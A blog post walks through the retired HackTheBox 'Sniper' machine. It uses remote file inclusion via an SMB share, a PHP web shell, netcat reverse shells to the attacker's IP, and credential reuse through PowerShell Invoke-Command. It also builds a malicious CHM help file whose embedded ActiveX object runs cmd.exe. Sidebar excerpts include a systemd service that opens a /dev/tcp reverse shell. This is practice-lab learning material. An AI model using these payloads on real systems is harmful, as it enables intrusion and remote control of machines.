Skip to main content

hackethebox retired sniper


Hackthebox.eu - Retired - Sniper

Recon

As always I start with a simple UP/Down scan on all TCP ports to see what is open

# nmap -T4 -p- -oX ./nmapb.xml sniper.htb

Then Convert it to HTML to make it pretty
 xsltproc ./nmapb.xml -o nmapb.html


Then rescan the open ports with -A to finger OS/Services
nmap -T4 -A -p80,135,139,445,49667 sniper.htb -oX ./nmapf.xml

Then convert that to HTML too
 xsltproc ./nmapf.xml -o ./nmapf.html


Looks like we have a windows box with IIS on port 80 RPC and smb

Let's see what we get when browsing the IIS
Blog from home page

And this login for "Client Portal"

Tried enrolling a new user with the name admin for possible account enumeration….

Nope, it just let me create it now problem




No anonymous access on smb

No access on RPC either

Exploit


Alight so I've poked around.
I think this might be susceptible to RFI

I found on this on the blog post  page

<li><a href="/blog?lang=blog-en.php">English</a></li>

Looks like we can use "?Lang" to call  other sites.

I started up a new tool I found about today called updog which is like simpleHTTPServer

# updog -d /root/Desktop/HTB/Sniper/ -p 80

And just tried to call my HTML output of nmap


So I don't see it calling out to my webserver to get the html file

I found this blog that says we might use smb to get around any filter that might be in place that was making a call via HTTP


So I started up an SmbServer
python /opt/impacket-master/examples/smbserver.py SHARE /root/Desktop/HTB/Sniper/ -smb2support

I added this from the blog to my /etc/samba/smbd.conf

[ica]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody

And changed my browser to point to

I get this error message, but I do see

An SMB connection from sniper.htb to my smbserver

I fought with this for a while but the SMB connection using impacket's smbserver.py kept closing and the PHP files weren't loading. So I followed what in the blog to use the samba server in kali. I also moved over the newest kali OS at this point too.

I eventually got the PHP in the blog to open and let me poke around a bit


I found this interesting file under the /user folder

Db.php

Looks like a user/pass

So username: dbuser 
Password: 36mEAhz/B8xQ~2VM
Dbname: sniper

Playing around trying to get a better shell

I did get a POC for a pingback

My PHP code

<?php  shell_exec('ping 10.10.14.48');?>

Saved as rs.php


Does indeed get pingback from the server


This gets ping back with either exec() or shell_exec()

I found a much better php shell

I stuck this in my /var/www/html/pub share




So much cleaner and the cmd actually works

Happy Eddie Murphy GIF


So we have a user named chris

So we have no write access to the box at all, nowhere to store our powershell scripts or netcat to get a reverse shell

How ever we do still have our smb share 

I moved nc.exe to my smb share and then on the PHP shell

Net use X: \\10.10.14.48\ica

We can see it mapped the drive as X

Now we should be able to use netcat to get our reverse shell


Make sure we are listening on our Kali box

Then on the PHP Shell

X:\nc.exe 10.10.14.48 443 -e C:\Windows\System32\cmd.exe


And 


We gotsta shell!!!!!!






Now let's try and get some info out of the DB we saw earlier.

For some reason I couldn't get any response on from just the cmd
So I loaded it up in powershell

Used this string to connect

./mysql.exe --user=dbuser --password=36mEAhz/B8xQ~2VM  sniper

Since we saw the table was called users earlier I just did
Select * From users;


We know from the login.php 



Login.php the password is md5

id      username        email password        trn_date
1       superuser       admin@sniper.co 6e573c8b25e9168e0c61895d821a3d57        2019-04-11 22:45:36

Popped that into a online hash decrypter


So user superuser
Password $uperpassw0rd


I tried getting some escalation with this account but couldn't' get anything..

But what about the dbuser password?  36mEAhz/B8xQ~2VM

I wonder if maybe that might be the password for the chris account.

I tired to connect to the SMB share on sniper using chris and that password


Yup password reuse FTW!!!

This took me forever to find the commands and get the syntax right for this next part

Basically we are going to use powershell to save the credentials and then call a new netcat connection to our attacking box

powershell
$username = 'sniper\chris'
$password = '36mEAhz/B8xQ~2VM'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Invoke-Command  -Credential $credential -Computer localhost -ScriptBlock {\\10.10.14.48\ica\nc.exe 10.10.14.48 55555 -e C:\windows\system32\cmd.exe}


Connected!

Let's get that user hash

type user.txt
21f************************************


Looking around I found a directory under C:\ named Docs

It contains a TXT and a nice note from the CEO

I also found an instructions.chm under the downloads folder.

What is a CHM file you ask?

Basically a help file that is really just so HTML pages

Cool how do you read a CHM file from command line?

You can use hh.exe which is included with windows…. How nice of them


Here is the output of the decompressed file

>hh.exe -decompile output instructions.chm

C:\temp\output>type a.html
type a.html
<html>
<body>
<h1>Sniper Android App Documentation</h1>

<h2>Table of Contents</h2>

<p>Pff... This dumb CEO always makes me do all the shitty work. SMH!</p>
<p>I'm never completing this thing. Gonna leave this place next week. Hope someone snipes him.</p>
</body>
</html>


But what might be more interesting than that is that you can open web pages with hh.exe also, since it is essentially just reading HTML files….

And you might be able to use HH.exe to bypass AV if they don't scan what it opens...


I wanted to get the instructions.chm to my samba share so I had to make some changes to  the config file and restart the service

I added


[ica]

path = /var/www/html/pub


public = yes
browseable = yes
create mask = 0777
read only = no
directory mode = 0777
force user = root

Then restarted the service

Service smbd restart


Now I can copy this file to my samba share


I went ahead and gabbed the txt file from the other directory too



I found this blog to get this next part going


I modified it at first just to ping back to my kali box

I inserted this to the HTML of a decompiled chm file I had on my windows box( It was nvidia CHM). Then saved the file as ping.htm


<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
  <PARAM name="Command" value="ShortCut">
  <PARAM name="Button" value="Bitmap::shortcut">
  <PARAM name="Item1" value=',cmd.exe,/c ping 10.10.14.48'>
  <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
  x.Click();
</SCRIPT>



Created a project.hpp

WIth this inside

[OPTIONS]

[FILES]
C:\Users\*********\Desktop\chm\ping.htm

Compiled it using 

C:\Users\*********\Desktop\chm\output>"C:\Program Files (x86)\HTML Help Workshop\hhc.exe" Project.hpp


Copied it over to my kali box

Then I copied it into the directory the boss told me to put the documentation in.
C:\docs


And  I got a ping back, which I assume happens when the boss opened the chm file to look at my documentation :)

Now we just need to get it to execute something so we can get a shell as our boss once he opens the documentation.


I spent a lot of time here trying to get this shell back, but it seems like even though it executes the chm file as the boss, there isn't actually a session for me to grab hold of here… 


So what about just writing the file out to a place we can read.

I put this line in my HTML file
  <PARAM name="Item1" value=',cmd.exe, /c type C:\Users\administrator\Desktop\root.txt > C:\temp\root.txt'>
Recompiled my CHM
Renamed it to Project-type.chm

Moved it to my SMB


Copied it to C:\docs

After a minute my chm disappeared as is the usual for chm files in the C:\docs directory. Which emulates the box reading the documentation and moving it to another location.


Then in the C:\temp folder we created we see our root.txt


Now we can read it !!!!!


John Huston Dude GIF by Warner Archive


I know that technically we could use this to completely take over the box, but it just feels cheap writing out the root.txt to a location we can read.






Comments

Popular posts from this blog

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The